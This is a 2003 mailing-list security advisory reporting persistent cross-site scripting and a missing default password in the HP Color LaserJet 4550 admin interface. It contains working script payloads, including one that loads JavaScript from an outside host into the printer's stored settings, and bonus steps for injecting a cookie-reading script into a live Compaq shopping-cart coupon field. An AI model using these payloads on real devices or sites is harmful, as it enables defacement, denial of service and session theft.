[Full-Disclosure] HP 4550 Printer - Remote XSS DoS -

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 07/24/03

  • Next message: Faulty: "[Full-Disclosure] morning_wood should stop posting xss vulns in sites and fix his own site." 
    To: <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>
Date: Thu, 24 Jul 2003 02:07:58 -0700

    ------------------------------------------------------------------
              - EXPL-A-2003-018 exploitlabs.com Advisory 018
    ------------------------------------------------------------------
                      -= HP Color LaserJet 4550 =-

    Donnie Werner
    July 22, 2003
    http://exploitlabs.com

    Product:
    --------
    Hewlet Packard Color LaserJet 4550 ( possibly others )

    Vunerability(s):
    ----------------
    1. Remote Persistant Xss DoS
    2. no default password

    Description of product:
    -----------------------
    "Designed for business professionals who want
     to communicate more effectively using high-quality,
      professional - looking color documents"

    VUNERABILITY / EXPLOIT
    ======================

    1. Remote Persistant Xss DoS
    -------------------------------

    The remote administration interface of the
    HP Color LaserJet 4550 uses extensive javascript in
    building dynamic content for administration of the
    printers setup and manegment.

    uhh oh..

    Detail: by introducing XSS we render the remote interface useless...

    Example 1.

    Add Link:
     The HP allows an inclusion of a user definable link...

    http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
    http://[printer-ip]/hp/device/this.LCDispatcher

    -------
    Device:
     LINKS:

    use: <script>alert("You are vunerable to xss - discovered by morning_wood
    http://exploitlabs.com")</script>

    when re-renderd we get weird out put depending on the JS used..
    some examples..

    http://

    " id="lnkOtherLink0" target="_blank">

    http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=

    as you can see the left hand menu has completly been rendered useless...
    ( sorry )

    looking at the source...

    --------- snip -------------
    }
    document.writeln('<div id="navcap"><img border="0"
    src="images/button_bottom.gif" width="140" height="21"><BR>');
    string = 'Other Links';
    document.writeln('<p><b>' + string + '</b><br>');
    tmpString = '<a target="_blank"
    href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer"
    id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
    size="2">My Printer</font></a><br><a target="_blank"
    href="this.LCDispatcher?dispatch=html&page=order_supplies"
    id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
    size="2">Order Supplies</font></a><br><a target="_blank"
    href="    http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=
    x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
    size="2">Solve A Problem</font></a><br>';
    document.writeln(tmpString);
    tmpString = '<a href="http://>alert("You are vunerable to xss -
    discover" id="lnkOtherLink0" target="_blank"><font
    face="Helvetica,Arial,Gill Sans,Sans Serif"
    size="2"><script>alert("Y</font></a><br>';
    document.writeln(tmpString + '</p>');
    document.writeln('</div>');
    mapheight = navcaptop - topofbuttons;
    document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif"
    width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
    document.writeln('<MAP NAME="buttonsmap">');
    for (var i=0; i < buttonarray.length; i++) {
    document.writeln('<AREA SHAPE="rect"
    COORDS="'+buttonarray[i]['mapcoords']+'",
    HREF="'+buttonarray[i]['href']+'">');
    }document.writeln('</MAP>');</script>
    ------- snip -------------

    ouch!!

    Example 2.

    DIAGNOSTICS
     Network Statistics
    > Protocol Info
     Test Page

    system contact and system location boxes both vuln to..

    <script language="JavaScript"
    src="    http://www.astalavista.com/backend/news.js"
    type="text/javascript"></script>

    which allows remote inclusion that is persistant

    this writes to the rom and is viewable even over snmp

    I am assuming the only way to fix these issues
     are to upgrade the rom or reset via a CLI interface

    2. no password
    -----------------------
    if this was set this couldnt happen I guess.. ( oops again )

    Local:
    ------
    yes

    Remote:
    -------
    yes

    Vendor Fix:
    -----------
    No fix on 0day ( aww.. shucks )

    Vendor Contact:
    ---------------
    Concurrent with this advisory
    support@hp.com
    security@hp.com

    Credits:
    --------
    Donnie Werner
    morning_wood@exploitlabs.com
    http://exploitlabs.com

    Original Advisory at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-018-hp4550.txt

    ===================================
    BONUS !!! EXTRA FUN WiTH HP / COMPAQ:
    ===================================

    http://www.smb.compaq.com/dcart/cart.asp?

    choose any product area
    go to shoping cart
    pick a product / quan
    go to checkout

    locate the "e-coupon" box
    enter <script>document.write(document.cookie)</script>
    press "Submit"
    laugh "real hard"

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Faulty: "[Full-Disclosure] morning_wood should stop posting xss vulns in sites and fix his own site."